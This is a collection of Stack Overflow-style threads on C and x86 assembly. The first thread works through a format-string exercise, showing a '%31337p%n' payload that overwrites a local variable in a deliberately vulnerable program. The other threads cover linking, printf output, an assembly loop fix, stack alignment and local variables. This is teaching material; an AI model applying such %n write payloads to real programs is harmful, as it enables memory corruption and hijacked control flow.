#include <stdio.h>
/*
 * Deliberately vulnerable exercise program: the user's input is handed to
 * printf() as the format string. func() is called only if the local
 * variable a ends up holding 31337 after that printf() call.
 */
int main()
{
    char s[200];        /* fixed: this declaration was missing its ';' */
    int a=123;          /* value the attacker has to change to 31337 */
    int b=&a;           /* address of a stored in an int; otherwise unused */
    scanf("%50s",s);    /* reads at most 50 non-whitespace characters */
    printf(s);          /* intentional: input is used as the format string */
    if (a==31337)
        func();
}
The aim is to carry out a format string attack: to get func() executed by supplying a crafted input string. I tried to use %n to overwrite the variable, but I came to the conclusion that it is impossible without displaying the b variable first, and I have no idea how to do that. Any hint would be appreciated. Sorry for my bad English.
Let's try with and without printing:
$ cat > f.c << \EOF
#include <stdio.h>
void func() { /* target of the exercise: announces on stderr that it was called */
fprintf(stderr, "func\n");
}
int main()
{
char s[200];
int a=123;
int b=&a;
#ifdef FIXER
fprintf(stderr, "%p\n", b); /* make "b" actually used somewhere */
#endif
scanf("%50s",s);
printf(s);
if (a==31337)
func();
}
EOF
$ gcc --version | head -n 1; uname -m
gcc (Debian 4.7.2-5) 4.7.2
i686
$ gcc -S f.c -o doesnt_work.s
f.c: In function 'main':
f.c:10:11: warning: initialization makes integer from pointer without a cast [enabled by default]
$ gcc -S -DFIXER f.c -o does_work.s
f.c: In function 'main':
f.c:10:11: warning: initialization makes integer from pointer without a cast [enabled by default]
$ gcc doesnt_work.s -o doesnt_work; gcc does_work.s -o does_work
$ echo '%31337p%n' | ./does_work > /dev/null
0xbfe75970
func
$ echo '%31337p%n' | ./doesnt_work > /dev/null
Segmentation fault
As stated in the question, we clearly see that without printing b first it fails.
Let's compare what is happening inside:
$ diff -ur does_work.s doesnt_work.s
--- does_work.s 2013-02-06 03:17:06.000000000 +0300
+++ doesnt_work.s 2013-02-06 03:16:52.000000000 +0300
@@ -29,8 +29,6 @@
.size func, .-func
.section .rodata
.LC1:
- .string "%p\n"
-.LC2:
.string "%50s"
.text
.globl main
@@ -48,15 +46,9 @@
movl $123, 16(%esp)
leal 16(%esp), %eax
movl %eax, 220(%esp)
- movl stderr, %eax
- movl 220(%esp), %edx /* !!! */
- movl %edx, 8(%esp) /* !!! */
- movl $.LC1, 4(%esp)
- movl %eax, (%esp)
- call fprintf
leal 20(%esp), %eax
movl %eax, 4(%esp)
- movl $.LC2, (%esp)
+ movl $.LC1, (%esp)
call __isoc99_scanf
leal 20(%esp), %eax
movl %eax, (%esp)
On the marked lines we see "get the value of b into %edx, then put it on the stack as the third argument."
As printf and scanf use cdecl call convention, the stack remains more or less the same across invocations, so that third argument remains available for the vulnerable printf for setting.
When we don't print b, it does not get into stack to be easily available for our injected format string.
With enough %p%p%p%p%p%p... we should be able to reach our actual a or b anyway, but the limitation of 50 input characters is getting in our way.
Related
I'm on Windows 11 on a 64-bit machine and, for didactic purposes, I'm trying to compile a C file (.c) together with an assembly file (.s) as a 32-bit program, using the following command:
gcc -m32 <file.c> <file.s> -o <name_file>
but the compilation failed reporting the following error:
C:\Users\david\AppData\Local\Temp\ccQPXOVR.o:e2_main.c:(.text+0x1a): undefined reference to `f'
collect2.exe: error: ld returned 1 exit status
The MinGW version that I use is: x86_64-8.1.0-posix-sjlj-rt_v6-rev0
I think the problem is in the ld linker, because compiling the same files but in 64 bits through the following command: gcc -m64 <file.c> <file.s> -o <name_file> does not give me an error (but it is not what I need, I need to compile them in 32 bits).
Below I report the code files that I should compile
<file.c>
#include <stdio.h>
int f(int x);
int score, trials;
/*
 * Runs one test case: calls f(x), prints the result next to the expected
 * value c, and updates the global counters (trials always, score on a match).
 */
void test(int x, int c) {
    int result;

    ++trials;
    result = f(x);
    printf("Test %d: %d [corretto: %d]\n", trials, result, c);
    if (result == c)
        ++score;
}
/* Runs the four fixed test cases in order, then prints the final score. */
int main() {
    /* Each row is { argument passed to f, expected result }. */
    static const int cases[][2] = {
        { 3, -2 },
        { 4, 5 },
        { 7, 50 },
        { 17, 460 },
    };
    unsigned int i;

    for (i = 0; i < sizeof cases / sizeof cases[0]; ++i)
        test(cases[i][0], cases[i][1]);

    printf("Risultato: %d/%d\n", score, trials);
    return 0;
}
<file.s>
# int f(int x)  --  returns 2*x*x - 7*x + 1
# Syntax: AT&T (GAS), 32-bit x86. The argument is read from 4(%esp).
# In:    4(%esp) = x
# Out:   %eax    = result
# Clobb: %ecx (= x), %edx (= 7*x), flags
.globl f
f:
    movl    4(%esp), %ecx           # ecx = x
    leal    (%ecx,%ecx), %eax       # eax = 2*x
    imull   %ecx, %eax              # eax = 2*x*x
    imull   $7, %ecx, %edx          # edx = 7*x
    subl    %edx, %eax              # eax = 2*x*x - 7*x
    incl    %eax                    # eax = 2*x*x - 7*x + 1
    ret
Any ideas on how I can fix it?
I would hugely appreciate any suggestions or guidance on what to do or try next, as I am a little stuck and unsure from here.
I also tried compiling another C program with the -m32 flag, without linking any assembly file, and that seems to have worked.
I tried installing i686-8.1.0-release-posix-sjlj-rt_v6-rev0, but it doesn't seem to change anything when I compile with -m32.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 1 year ago.
Improve this question
I've just started reading about C and currently playing around with format specifiers.
Here is the code example:
#include <stdio.h>
int main(void) {
char code = 'a' - 'A'; /* difference of the two character codes; shown as 32 in the sample output */
printf("\n>>>%c (%d)", code, code); /* same value printed as a character and as a number */
printf("\n>>>%c", 32); /* prints the character whose code is 32 */
char incode;
printf("\n\nGive me some char: ");
scanf("%c", &incode); /* reads one character; the return value is not checked */
printf("\n>>>%c (%d)", incode, incode); /* echoes the typed character and its code */
return 0;
}
The output:
PS C:\ex> ./print
>>> (32)
>>>
Give me some char: A
>>>A (65)
So, why does %c work in the last printf and doesn't work in the beginning?
I tested this sample on Windows and on Linux and both behave identically.
Windows compiler: gcc.exe (x86_64-posix-seh-rev0, Built by MinGW-W64 project) 8.1.0
Linux compiler: clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)
ASCII 32 is ' ' (space). It is printed alright, you just can't see it.
If you change the format string to "\n>>>%c<< (%d)" you will see it in the (pun) negative space.
You can also pass the output through od -a to confirm.
Assume that your character encoding is ASCII. Then a is encoded as 97 (decimal) and A is encoded as 65 (decimal). Their difference is 32, which encodes the space character.
So char code = 'a' - 'A'; is the same as char code = 32; which is the same as the declaration char code = ' ';
See also this C reference website.
If allowed, compile with all warnings and debug info, so (with GCC) as gcc -Wall -Wextra -g
You could compile your C source code minerals.c with gcc -Wall -O -fverbose-asm minerals.c -S -o minerals.s and look inside the generated assembler code minerals.s. On my Debian computer with GCC 10.2 I am getting the following warning:
minerals.c: In function ‘main’:
minerals.c:11:5: warning: ignoring return value of ‘scanf’ declared with attribute ‘warn_unused_result’ [-Wunused-result]
11 | scanf("%c", &incode);
| ^~~~~~~~~~~~~~~~~~~~
The generated assembler code has:
# /usr/include/x86_64-linux-gnu/bits/stdio2.h:107: return __printf_chk (__USE_FORTIFY_LEVEL - 1, __fmt, __va_arg_pack ());
# Excerpt of compiler output: three printf calls lowered to __printf_chk.
# In each call %edi carries the leading flag argument and %rsi the format string.
# Fixed: the PLT suffix is written with '@'; '#' would start a comment here.
# First call: both value arguments are the constant 32.
movl $32, %ecx #,
movl $32, %edx #,
leaq .LC0(%rip), %rsi #,
movl $1, %edi #,
call __printf_chk@PLT #
# Second call: a single value argument, again 32.
movl $32, %edx #, // 32 is the space
leaq .LC1(%rip), %rsi #,
movl $1, %edi #,
movl $0, %eax #,
call __printf_chk@PLT #
# Third call: format string only.
leaq .LC2(%rip), %rsi #,
movl $1, %edi #,
movl $0, %eax #,
call __printf_chk@PLT #
Actually, in 2021, UTF-8 is used everywhere (and complicates matter). Look into GNU libunistring.
Good evening, i'm trying to translate this code of mine from C to assembly IA32:
int i=0;
char s[3]; char c[n]; /* s holds three chars; c has n elements */
for(i=0;i<3;i++){ /* copy c[0..2] into s[0..2] */
s[i]=c[i];
}
n is a char that receives a value from the user. By the time this "for" loop executes, "c" is already filled with chars. As you can see, I want to fill "s" with the first three entries of "c". I translated this code to assembly like this:
# Syntax: AT&T (GAS), 32-bit x86; arguments are pushed on the stack.
# Reads a string into c and an integer into n, copies c[0..2] to s, prints s.
.data
is: .asciz "%s" # format used for both reading and printing a string
id: .asciz "%d" # format used for reading the integer
.bss
.comm c,500,1 # c: 500 bytes
.comm s,500,1 # s: 500 bytes
.comm n,4,4 # n: 4 bytes
.global main
main: # NOTE(review): no section directive appears between .bss above and this label
# read a string into "c"
pushl $c
pushl $is
call scanf
addl $8,%esp # drop the two pushed arguments
# read an integer into "n"
pushl $n
pushl $id
call scanf
addl $8,%esp # drop the two pushed arguments
movl $0,%eax # eax = loop index i
for:
cmpl $3,%eax
jge endfor # leave the loop once i >= 3
movb c(%eax),%cl # cl = c[i]
movb %cl,s(%eax) # s[i] = cl
incl %eax
jmp for
endfor:
movl $0,%eax
pushl %eax # pushes 0 before the two printf arguments
pushl $s
pushl $is
call printf
addl $8,%ebp # NOTE(review): this adjusts %ebp, whereas the earlier calls adjust %esp
popl %eax
# NOTE(review): the listing ends here without a ret instruction
Thing is when i execute this code it doesn't print anything at all, it's like "s" array it's empty, i've tried several things and nothing has worked so far. Any assembly genius to give me a hand?
:-) Thanks!
Following worked fine for me:
# Syntax: AT&T (GAS), 32-bit x86; arguments are pushed on the stack.
# Reads a string into c and an integer into n, copies c[0..2] to s, prints s.
.data
is: .asciz "%s" # format used for both reading and printing a string
id: .asciz "%d" # format used for reading the integer
.bss
.comm c,500,1 # c: 500 bytes
.comm s,500,1 # s: 500 bytes
.comm n,4,4 # n: 4 bytes
.text
.global main
main:
# read a string into "c"
pushl $c
pushl $is
call scanf
addl $8,%esp # drop the two pushed arguments
# read an integer into "n"
pushl $n
pushl $id
call scanf
addl $8,%esp # drop the two pushed arguments
movl $0,%eax # eax = loop index i
for:
cmpl $3,%eax
jge endfor # leave the loop once i >= 3
movb c(%eax),%cl # cl = c[i]
movb %cl,s(%eax) # s[i] = cl
incl %eax
jmp for
endfor:
movl $0,%eax
pushl %eax # pushes 0 before the two printf arguments
pushl $s
pushl $is
call printf
addl $8,%esp # drop the two printf arguments
popl %eax # pops the 0 pushed above back into eax
ret
Code belongs in .text, not in .bss
addl $8,%ebp near end should have been addl $8,%esp to fix stack pointer after printf call
needed ret at the end of main
you probably should explicitly store a nul terminator at the end of the string (unless you're expecting to copy it from the source string). I didn't make that change, however.
I don't think I changed anything else.
Assembled and linked with:
as -g -32 test.s -o test.o
gcc -g -m32 test.o
Input:
abc 3
Output:
abc
My c code:
#include <stdio.h>
foo() /* declared without a return type or parameter list */
{
char buffer[8]; /* 8-byte local array; never read or written */
}
main() /* declared without a return type or parameter list */
{
foo(); /* the only call; foo's stack frame is what the question examines */
return 0;
}
I compile it using gcc -ggdb -mpreferred-stack-boundary=2 -o bar bar.c
When I load it using GDB ./bar I see that inside the foo function the code is:
sub $0x0c,$esp
Why is this happening?
I want buffer to take 8 bytes on the stack, so it should be sub $0x8,$esp!
Why can't I set stack boundary to 4 bytes?
Help!
I can't reproduce exactly what you are seeing, but on my 4.8.2 version of gcc, the option does affect the amount of stack used with this code (make sure "buffer" is used to avoid it being optimised away, and fix the warnings for no return type/argument types):
#include <stdio.h>
void foo(void)
{
char buffer[8];
buffer[0] = 'a';
buffer[1] = '\n';
buffer[2] = 0;
printf("my first program! %s\n", buffer);
}
/* Calls foo() once and returns 0. */
int main()
{
foo();
return 0;
}
Compiled with -mpreferred-stack-boundary=2 and -mpreferred-stack-boundary=4, and the difference between the generated assembler is notable:
$ diff -u stb-2.s stb-4.s
--- stb-2.s 2014-04-10 09:00:39.546038191 +0100
+++ stb-4.s 2014-04-10 09:00:58.895108979 +0100
@@ -15,11 +15,11 @@
.cfi_offset 5, -8
movl %esp, %ebp
.cfi_def_cfa_register 5
- subl $16, %esp
- movb $97, -8(%ebp)
- movb $10, -7(%ebp)
- movb $0, -6(%ebp)
- leal -8(%ebp), %eax
+ subl $40, %esp
+ movb $97, -16(%ebp)
+ movb $10, -15(%ebp)
+ movb $0, -14(%ebp)
+ leal -16(%ebp), %eax
movl %eax, 4(%esp)
movl $.LC0, (%esp)
.LEHB0:
@@ -67,9 +67,10 @@
.cfi_offset 5, -8
movl %esp, %ebp
.cfi_def_cfa_register 5
+ andl $-16, %esp
call _Z3foov
movl $0, %eax
- popl %ebp
+ leave
.cfi_restore 5
.cfi_def_cfa 4, 4
ret
So, at least in gcc 4.8.2. for x86-32, the option has an effect.
Of course, the default according to the docs is -mpreferred-stack-boundary=2, so maybe that's why you can't see any difference from "without" (Although in my experiments, it seems that it's -mpreferred-stack-boundary=4). [Moment passes] Ah, the default has been changed over time, so the 4.4.2 docs online says 2, my info gcc for 4.8.2 says 4, which explains the difference.
As to why your code is allocating twelve bytes of stack-space - look at how printf is called:
movl $.LC0, (%esp)
call printf
If the compiler can, it will pre-allocate argument space for function calls at the start of the function, rather than use push $.LC0 as it would be in this case. It's not much difference, but it saves at least one instruction for cleanup at the other side of printf (and it makes it MUCH easier to deal with stack-relative offsets within the produced code, since the compiler doesn't have to keep track of where the current stack-pointer is - it's always at a constant place after the prologue code at the beginning of the function, all the way to the end of the function). Since the space is ultimately required anyway, there's no point in "saving 4 bytes".
The C function backtrace just returns the series of function calls for the program, but I want to list all the local variables in my program, just like info locals in gdb. Any idea if this can be done? Thanks
Generally, no. You should move away from thinking about a "stack" as some sort of god given factum. A call stack is merely a common implementation technique for C. It has no intrinsic meaning or required semantics. Automatic variables ("local variables", as you say) have to behave in a certain way, and sometimes that means that they are written onto the call stack. However, it is entirely conceivable that local variables are never realized in memory at all -- they may instead only ever be stored in a processor register, or eliminated entirely if an equivalent program can be formulated without them.
So, no, there is no language-intrinsic mechanism for enumerating local variables. As you say, the debugger can do so to some extent (depending on debug symbols being present and subject to optimizations); perhaps you can find a library that can process debug symbols from within a running program.
If this is just for occasional debugging, then you can invoke the debugger. However, since the debugger itself will freeze your program, you need an intermediary to capture the output. You can, for example, use system, and redirect the output to a file, then read the file afterwards. In the example below, the file gdbcmds.txt contains the line info locals.
char buf[512];
FILE *gdb;
snprintf(buf, sizeof(buf), "gdb -batch -x gdbcmds.txt -p %d > gdbout.txt",
(int)getpid());
system(buf);
gdb = fopen("gdbout.txt", "r");
while (fgets(buf, sizeof(buf), gdb) != 0) {
printf("%s", buf);
}
fclose(gdb);
First, note that backtrace is not a standard C library function, but a GNU-specific extension.
In general, it's difficult or impossible to retrieve local variable information from compiled code, especially if it was compiled without debugging or with optimization enabled. If debugging isn't turned on, variable names and types are generally not preserved in the resulting machine code.
For example, take the following ridiculously simple code:
#include <stdio.h>
#include <math.h>
/* Computes z from two constants and prints all three values. */
int main(void)
{
int x = 1, y = 2, z;
z = 2 * y - x; /* 3 for these initial values */
printf("x = %d, y = %d, z = %d\n", x, y, z);
return 0;
}
Here's the resulting machine code, no debugging or optimization:
.file "varinfo.c"
.version "01.01"
# Compiler output for varinfo.c, no optimisation. AT&T syntax, 32-bit x86.
# Locals: x at -4(%ebp), y at -8(%ebp), z at -12(%ebp).
# Fixed: the .type argument is written "@function"; '#' would start a comment here.
gcc2_compiled.:
.section .rodata
.LC0:
.string "x = %d, y = %d, z = %d\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp, %ebp
subl $24, %esp # reserve stack space for the frame
movl $1, -4(%ebp) # x = 1
movl $2, -8(%ebp) # y = 2
movl -8(%ebp), %eax # eax = y
movl %eax, %eax # no effect: copies eax to itself
sall $1, %eax # eax = 2 * y
subl -4(%ebp), %eax # eax = 2 * y - x
movl %eax, -12(%ebp) # z = eax
pushl -12(%ebp) # printf arguments, pushed last to first: z
pushl -8(%ebp) # y
pushl -4(%ebp) # x
pushl $.LC0 # format string
call printf
addl $16, %esp # drop the four pushed arguments
movl $0, %eax # return value 0
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.2 2.96-112.7.2)"
x, y, and z are referred to through -4(%ebp), -8(%ebp), and -12(%ebp) respectively. There's nothing to indicate that they're integers other than the instructions used to perform the arithmetic.
It's even better with optimization (-O1) turned on:
.file "varinfo.c"
.version "01.01"
# Compiler output for varinfo.c at -O1. AT&T syntax, 32-bit x86.
# No stack slots are used for x, y or z: their values appear as immediates.
# Fixed: "@progbits" and "@function" are written with '@'; '#' would start a comment here.
gcc2_compiled.:
.section .rodata.str1.1,"ams",@progbits,1
.LC0:
.string "x = %d, y = %d, z = %d\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
pushl $3 # z, already computed by the compiler
pushl $2 # y
pushl $1 # x
pushl $.LC0 # format string
call printf
movl $0, %eax # return value 0
leave # restores %esp from %ebp, so no explicit argument cleanup is needed
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.2 2.96-112.7.2)"
In this case, the compiler was able to do some static analysis and compute the value z at compile time; there's no need to set aside any memory for any of the variables at all, because the compiler already knows what those values have to be.